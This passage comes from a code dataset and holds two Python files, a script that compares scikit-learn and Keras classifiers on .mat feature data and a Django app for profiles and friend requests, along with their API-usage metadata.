29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 56, "usage_type": "call"}, {"api_name": "DecisionTree.DecisionTree", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "606531671", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 6 02:43:04 2019\r\n\r\n@author: Guangyu\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 5 00:06:32 2019\r\n\r\n@author: Guangyu\r\n\"\"\"\r\n\r\n\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.models import Model\r\nfrom keras.layers import Dense, Dropout, Flatten, BatchNormalization, ReLU, Input\r\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D\r\nfrom keras import backend as K\r\nfrom keras.callbacks import ModelCheckpoint\r\nimport h5py\r\nimport numpy as np\r\nimport struct\r\nimport scipy\r\nfrom scipy import stats\r\nimport scipy.io as sio\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nimport timeit\r\nimport numpy as np\r\nimport scipy.io as sio \r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.svm import SVC \r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import tree\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom IPython.display import Image\r\nimport pydotplus \r\nfrom numpy import ones\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn import decomposition\r\nfrom sklearn.naive_bayes import GaussianNB\r\n\r\n\r\ndata1 = sio.loadmat('XTrain_same_with_NN_4_160.mat')\r\ndata1 = data1.get('Feature_Input_raw_train')\r\n\r\n\r\ndata2 = sio.loadmat('XTest_same_with_NN_4_160.mat')\r\ndata2 = data2.get('Feature_Input_raw_test')\r\n#data2 = data2.transpose()\r\n\r\nytrain = sio.loadmat('YTrain_same_with_NN_4_160.mat')\r\ndata_train_label = ytrain.get('YTrain')\r\n\r\nytest = sio.loadmat('YTest_same_with_NN_4_160.mat')\r\ndata_test_label = ytest.get('YTest')\r\n\r\nytrain1 = sio.loadmat('target_train_3_class_19_01_2020.mat')\r\ndata_train_label_1 = ytrain1.get('target_train')\r\n\r\nytest1 = sio.loadmat('target_test_3_class_19_01_2020.mat')\r\ndata_test_label_1 = ytest1.get('target_test')\r\n\r\nytest_target = sio.loadmat('data_target_160.mat')\r\nytest_target= ytest_target.get('data_target')\r\nytest_target1 = []\r\nfor i in ytest_target:\r\n temp = i\r\n ytest_target1.append(temp)\r\n \r\n#####################################old nn\r\nmodel = Sequential()\r\nmodel.add(Dense(units=200,activation='relu', input_dim=4))\r\nmodel.add(Dense(units=200,activation='relu'))\r\nmodel.add(Dense(units=200,activation='relu'))\r\nmodel.add(Dense(units=10,activation='softmax'))\r\nmodel.compile(optimizer='sgd', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\nmodel.fit(data1, ytrain1,\r\n batch_size=128,\r\n epochs=100, \r\n verbose=1,\r\n shuffle=True)\r\n\r\nfrom neupy import algorithms\r\nlmnet = algorithms.LevenbergMarquardt((4, 10, 10),show_epoch=1)\r\nlmnet.train(data1, ytrain1)\r\n\r\n\r\n\r\n##################################rf top classifier\r\ndata_train_label = np.ravel(data_train_label_1)\r\nclf_rf = RandomForestClassifier()\r\nclf_rf.fit(data1, data_train_label_1)\r\ny_pred_rf = clf_rf.predict(data2)\r\nacc_rf = accuracy_score(data_test_label_1, y_pred_rf)\r\nprint(acc_rf)\r\nacc_rf_train = clf_rf.score(data1, data_train_label_1)\r\nprint(acc_rf_train)\r\n#0.9625\r\n#0.996875\r\n#################################rf \r\ndata_train_label = np.ravel(data_train_label)\r\nclf_rf = RandomForestClassifier()\r\nclf_rf.fit(data1, data_train_label)\r\ny_pred_rf = clf_rf.predict(data2)\r\nacc_rf = accuracy_score(data_test_label, y_pred_rf)\r\nprint(acc_rf)\r\nacc_rf_train = clf_rf.score(data1, data_train_label)\r\nprint(acc_rf_train)\r\n################################svm\r\ny_train = np.ravel(data_train_label)\r\ny_test = np.ravel(data_test_label)\r\nclf_svm = SVC(kernel='rbf') \r\nclf_svm.fit(data1, y_train)\r\ny_pred_svm = clf_svm.predict(data2)\r\nacc_svm = accuracy_score(y_test, y_pred_svm)\r\nprint(acc_svm)\r\nacc_svm_train = clf_svm.score(data1, y_train)\r\nprint(acc_svm_train)\r\nacc_svm_test = clf_svm.score(data2, y_test)\r\nprint(acc_svm_test)\r\n\r\n#72.5%\r\n##################################dt\r\nclf = tree.DecisionTreeClassifier()\r\nclf.fit(data1, data_train_label)\r\ny_pred_decisiontree = clf.predict(data2)\r\nscore=clf.score(data2,data_test_label)\r\nprint(\"%f\"%score)\r\nscore_train=clf.score(data1, data_train_label)\r\nprint(\"%f\"%score_train)\r\n\r\ndot_data = tree.export_graphviz(clf, out_file=None, \r\n filled=True, rounded=True) \r\ngraph = pydotplus.graph_from_dot_data(dot_data) \r\n#Image(graph.create_png())\r\n#graph.write_jpg(\"dt.jpg\")\r\n#0.90\r\n##################################dt-top-3\r\nclf = tree.DecisionTreeClassifier()\r\nclf.fit(data1, data_train_label_1)\r\ny_pred_decisiontree = clf.predict(data2)\r\nscore=clf.score(data2,data_test_label_1)\r\nprint(\"%f\"%score)\r\nscore_train=clf.score(data1, data_train_label_1)\r\nprint(\"%f\"%score_train)\r\n###0.931250\r\n###1.000000\r\ndot_data = tree.export_graphviz(clf, out_file=None, \r\n filled=True, rounded=True) \r\ngraph = pydotplus.graph_from_dot_data(dot_data) \r\n#Image(graph.create_png())\r\n#graph.write_jpg(\"dt.jpg\")\r\n#0.90\r\n##################################knn\r\nclf_knn = KNeighborsClassifier(n_neighbors=3)\r\nclf_knn.fit(data1, data_train_label)\r\ny_pred_knn = clf_knn.predict(data2)\r\nacc_knn = accuracy_score(data_test_label, y_pred_knn)\r\nprint(acc_knn)\r\nacc_knn_train = clf_knn.score(data1, data_train_label)\r\nprint(acc_knn_train)\r\n##################################### knn-3\r\nclf_knn = KNeighborsClassifier(n_neighbors=3)\r\nclf_knn.fit(data1, data_train_label_1)\r\ny_pred_knn = clf_knn.predict(data2)\r\nacc_knn = accuracy_score(data_test_label_1, y_pred_knn)\r\nprint(acc_knn)\r\nacc_knn_train = clf_knn.score(data1, data_train_label_1)\r\nprint(acc_knn_train)\r\n\r\n#95%\r\n##################################################nn\r\ny_train = np.ravel(data_train_label)\r\ny_test = np.ravel(data_test_label)\r\nclf_nn = MLPClassifier(hidden_layer_sizes=(21,21,21,),verbose=1,activation='logistic')\r\nclf_nn.fit(data1, y_train)\r\ny_pred_nn = clf_nn.predict(data2)\r\nacc_nn = clf_nn.score(data2,y_test)\r\nprint(acc_nn)\r\n#0.1\r\n####################################################sgd\r\nclf_sgd = SGDClassifier()\r\nclf_sgd.fit(data1, data_train_label)\r\ny_pred_sgd = clf_sgd.predict(data2)\r\nacc_sgd = accuracy_score(data_test_label, y_pred_sgd)\r\nprint(\"stochastic gradient descent accuracy: \",acc_sgd)\r\n\r\n##########################################################regression\r\ny_train = np.ravel(data_train_label)\r\ny_test = np.ravel(data_test_label)\r\nclf = LogisticRegression()\r\nclf.fit(data1,y_train)\r\nlr_test_sc=clf.score(data2,y_test)\r\nprint(\"regression: \",lr_test_sc)\r\nlr_train_sc=clf.score(data1,y_train)\r\nprint(\"regression: \",lr_train_sc)\r\n##########################################nb\r\nclf_gnb = GaussianNB()\r\nclf_gnb.fit(data1,y_train)\r\ny_pred_gnb = clf_gnb.predict(data2)\r\nacc_gnb = clf_gnb.score(data2, y_test)\r\nprint(\"nb accuracy: \",acc_gnb)\r\nacc_gnb_train = clf_gnb.score(data1, y_train)\r\nprint(\"nb accuracy: \",acc_gnb_train)\r\n\r\n##############################################AE+CNN\r\ndata1 = sio.loadmat('XTrain_same_with_NN_4_160.mat')\r\ndata1 = data1.get('Feature_Input_raw_train')\r\ndata1 = data1.reshape((320,2,2,1))\r\n\r\ndata2 = sio.loadmat('XTest_same_with_NN_4_160.mat')\r\ndata2 = data2.get('Feature_Input_raw_test')\r\ndata2 = data2.reshape((160,2,2,1))\r\n\r\ninput_img = Input(shape=(2,2,1))\r\nx = Conv2D(100, kernel_size=(2,1),activation='relu',padding = 'same')(input_img)\r\nx = BatchNormalization()(x)\r\nencoded = ReLU()(x)\r\nx = BatchNormalization()(encoded)\r\nx = Conv2D(100,(2,1),activation='relu', padding = 'same')(x)\r\ndecoded = Conv2D(1,(2,1),activation='relu', padding = 'same')(x)\r\n\r\nautoencoder = Model(input_img, decoded)\r\nautoencoder.summary()\r\nautoencoder.compile(optimizer='adam', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\n#earlystop=keras.callbacks.EarlyStopping(monitor='acc', min_delta=0, patience=3, verbose=0, mode='min')\r\nautoencoder.fit(data1, data1,\r\n batch_size=20,\r\n epochs=250,\r\n verbose=1,\r\n shuffle=True)\r\n #callbacks=[earlystop])\r\n\r\n\r\nencoder = Model(input_img, encoded)\r\nencoder.summary()\r\n\r\nlayer_index = 4\r\nintermediate_layer_model = Model(inputs=autoencoder.input,\r\n outputs=autoencoder.get_layer(index = layer_index).output)\r\nintermediate_output = intermediate_layer_model.predict(data1)\r\nintermediate_output_2 = intermediate_layer_model.predict(data2)\r\n\r\na = intermediate_output.shape\r\na = a[1:]\r\n\r\n\r\nytrain1 = keras.utils.to_categorical(data_train_label,11)\r\nytrain1 = np.delete(ytrain1,0,axis=1)\r\nytest1 = keras.utils.to_categorical(data_test_label,11)\r\nytest1 = np.delete(ytest1,0,axis=1)\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, BatchNormalization, ReLU\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras import backend as K\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(100, kernel_size=(2, 1),activation='relu',input_shape=a,padding = 'same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(ReLU())\r\nmodel.add(Conv2D(100, kernel_size=(2, 1),activation='relu',input_shape=a,padding = 'same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(ReLU())\r\nmodel.add(Flatten())\r\nmodel.add(Dropout(0.10))\r\n#model.add(Dense(10, activation='relu'))\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\nmodel.compile(loss='mse', \r\n optimizer = 'adam',\r\n metrics = ['accuracy'])\r\n#optimizer = keras.optimizers.Adam(lr=0.001,beta_1=0.90,beta_2=0.999,epsilon=None,decay=0.0,amsgrad=False), \r\n#optimizer = keras.optimizers.Adadelta(lr=1.0, rho=0.95, epsilon=None, decay=0.0),\r\nmodel.summary()\r\n\r\nmodel.fit(intermediate_output, ytrain1,\r\n batch_size=20,\r\n epochs=250, \r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(intermediate_output_2, ytest1))\r\n #validation_data=(intermediate_output_2, ytest1))\r\n\r\nmodel.compile(loss='mse', \r\n optimizer = 'sgd',\r\n metrics = ['accuracy'])\r\n\r\n\r\nmodel.fit(intermediate_output, ytrain1,\r\n batch_size=20,\r\n epochs=20, \r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(intermediate_output_2, ytest1))\r\n\r\nkeras.callbacks.EarlyStopping(monitor = 'val_acc',\r\n min_delta=0.1,\r\n patience=3,\r\n verbose=0,mode='auto')\r\nmodel.evaluate(intermediate_output_2, ytest1)\r\nmodel.evaluate(intermediate_output, ytrain1)\r\n####################################################CNN\r\n\r\ninput_img = Input(shape=(2,2,1))\r\nx = Conv2D(30, kernel_size=(2, 1),activation='relu',padding = 'same')(input_img)\r\nx = BatchNormalization()(x)\r\nx = ReLU()(x)\r\nx = Conv2D(50,(2,1),activation='relu',padding = 'same')(x)\r\nx = BatchNormalization()(x)\r\nx = ReLU()(x)\r\nx = Conv2D(50,(2,1),activation='relu',padding = 'same')(x)\r\nx = BatchNormalization()(x)\r\nx = ReLU()(x)\r\nx = Conv2D(20,(2,1),activation='relu',padding = 'same')(x)\r\nx = ReLU()(x)\r\nx = Dropout(0.2)(x)\r\nx = Flatten()(x)\r\nx_final = Dense(10,activation='softmax')(x)\r\n\r\ncnn = Model(input_img, x_final)\r\ncnn.summary()\r\ncnn.compile(optimizer='adam', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\n#earlystop=keras.callbacks.EarlyStopping(monitor='acc', min_delta=0, patience=3, verbose=0, mode='min')\r\ncnn.fit(data1, ytrain1,\r\n batch_size=15,\r\n epochs=100,\r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(data2, ytest1))\r\ncnn.compile(optimizer='sgd', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\n#earlystop=keras.callbacks.EarlyStopping(monitor='acc', min_delta=0, patience=3, verbose=0, mode='min')\r\ncnn.fit(data1, ytrain1,\r\n batch_size=15,\r\n epochs=10,\r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(data2, ytest1))\r\ncnn.evaluate(data2,ytest1)\r\ncnn.evaluate(data1,ytrain1)", "sub_path": "NN_KNN_SVM_RF_DF.py", "file_name": "NN_KNN_SVM_RF_DF.py", "file_ext": "py", "file_size_in_byte": 11919, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.io.loadmat", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 54, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 58, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 58, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 62, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 62, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 65, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 65, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 68, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 68, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 71, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 71, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 74, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 74, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 82, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 86, "usage_type": "call"}, {"api_name": "neupy.algorithms.LevenbergMarquardt", "line_number": 96, "usage_type": "call"}, {"api_name": "neupy.algorithms", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.ravel", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 136, "usage_type": "name"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 144, "usage_type": "name"}, {"api_name": "pydotplus.graph_from_dot_data", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 151, "usage_type": "name"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 160, "usage_type": "name"}, {"api_name": "pydotplus.graph_from_dot_data", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 187, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 194, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 210, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 219, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 219, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 223, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 223, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 227, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 228, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 229, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 230, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 231, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 232, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 233, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 235, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 252, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 261, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 261, "usage_type": "attribute"}, {"api_name": "numpy.delete", "line_number": 262, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 263, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.delete", "line_number": 264, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 272, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 273, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 274, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 275, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 276, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 277, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 278, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 280, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 282, "usage_type": "call"}, {"api_name": "keras.callbacks.EarlyStopping", "line_number": 311, "usage_type": "call"}, {"api_name": "keras.callbacks", "line_number": 311, "usage_type": "attribute"}, {"api_name": "keras.layers.Input", "line_number": 319, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 320, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 321, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 322, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 323, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 324, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 325, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 326, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 327, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 328, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 329, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 330, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 331, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 332, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 333, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 335, "usage_type": "call"}]} +{"seq_id": "147363309", "text": "from django.urls import path\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.decorators import login_required\n\n# models.py\nclass Profile(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n slug = models.SlugField()\n friends = models.ManyToManyField(\"Profile\", blank=True)\n\n def __str__(self):\n return str(self.user.username)\n\n def get_absolute_url(self):\n return \"/users/{}\".format(self.slug)\n\n\ndef post_save_user_model_receiver(sender, instance, created, *args, **kwargs):\n if created:\n try:\n Profile.objects.create(user=instance)\n except:\n pass\n\n\npost_save.connect(post_save_user_model_receiver,\n sender=settings.AUTH_USER_MODEL)\n\n\nclass FriendRequest(models.Model):\n to_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='to_user',\n on_delete=models.CASCADE\n )\n from_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='from_user',\n on_delete=models.CASCADE\n )\n timestamp = models.DateTimeField(auto_now_add=True) # set when created\n\n def __str__(self):\n return f\"From {self.from_user.username}, to {self.to_user.username}\"\n\n\nadmin.site.register(Profile)\nadmin.site.register(FriendRequest)\n\n# views.py\nUser = get_user_model()\n@login_required\ndef users_list(request):\n\tusers = Profile.objects.exclude(user=request.user)\n\tme = Profile.objects.get(user=request.user)\n\treturn render(request, \"accounts/home.html\", {'me':me,'users': users})\n\n\ndef send_friend_request(request, id):\n # id - id юзера которому ты отправляешь запрос на дружбу\n\tif request.user.is_authenticated:\n\t\tuser = get_object_or_404(User, id=id)\n\t\tfrequest, created = FriendRequest.objects.get_or_create(\n\t\t\tfrom_user=request.user,\n\t\t\tto_user=user\n\t\t)\n\t\treturn HttpResponseRedirect('/users')\n\n\ndef cancel_friend_request(request, id):\n\tif request.user.is_authenticated:\n\t\tuser = get_object_or_404(User, id=id)\n\t\tfrequest = FriendRequest.objects.filter(\n\t\t\tfrom_user=request.user,\n\t\t\tto_user=user).first()\n\t\tfrequest.delete()\n\t\treturn HttpResponseRedirect('/users')\n\n\ndef accept_friend_request(request, id):\n\tfrom_user = get_object_or_404(User, id=id)\n\tfrequest = FriendRequest.objects.filter(\n\t\tfrom_user=from_user, to_user=request.user).first()\n\tuser1 = frequest.to_user\n\tuser2 = from_user\n\tuser1.profile.friends.add(user2.profile)\n\tuser2.profile.friends.add(user1.profile)\n\tfrequest.delete()\n\treturn HttpResponseRedirect('/users/{}'.format(request.user.profile.slug))\n\n\ndef delete_friend_request(request, id):\n\tfrom_user = get_object_or_404(User, id=id)\n\tfrequest = FriendRequest.objects.filter(\n\t\tfrom_user=from_user, to_user=request.user).first()\n\tfrequest.delete()\n\treturn HttpResponseRedirect('/users/{}'.format(request.user.profile.slug))\n\n\ndef profile_view(request, slug):\n\tp = Profile.objects.filter(slug=slug).first()\n\tprint(Profile.objects.filter(slug='admin'))\n\tu = p.user\n\tsent_friend_requests = FriendRequest.objects.filter(from_user=p.user)\n\trec_friend_requests = FriendRequest.objects.filter(to_user=p.user)\n\tfriends = p.friends.all()\n\t# is this user our friend\n\tbutton_status = 'none'\n\tif p not in request.user.profile.friends.all():\n\t\t\tbutton_status = 'not_friend'\n\t\t\t# if we have sent him a friend request\n\t\t\tif len(FriendRequest.objects.filter(\n\t\t\t\t\t\t\tfrom_user=request.user).filter(to_user=p.user)) == 1:\n\t\t\t\t\tbutton_status = 'friend_request_sent'\n\tcontext = {\n\t\t\t'u': u,\n\t\t\t'button_status': button_status,\n\t\t\t'friends_list': friends,\n\t\t\t'sent_friend_requests': sent_friend_requests,\n\t\t\t'rec_friend_requests': rec_friend_requests\n\t}\n\treturn render(request, \"accounts/profile.html\", context)\n\n\n\n# def profile_view(request, slug):\n# \tp = Profile.objects.filter(slug=slug).first()\n# \tu = p.user\n# \tsent_friend_request = FriendRequest.objects.filter(from_user=p.user)\n# \trec_friend_request = FriendRequest.objects.filter(to_user=p.user)\n# \tfriends = p.friends.all()\n", "sub_path": "jd/10_friends/accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4466, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.models.Model", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.signals.post_save.connect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models.signals.post_save", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 53, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 54, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 54, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 57, "usage_type": "call"}, 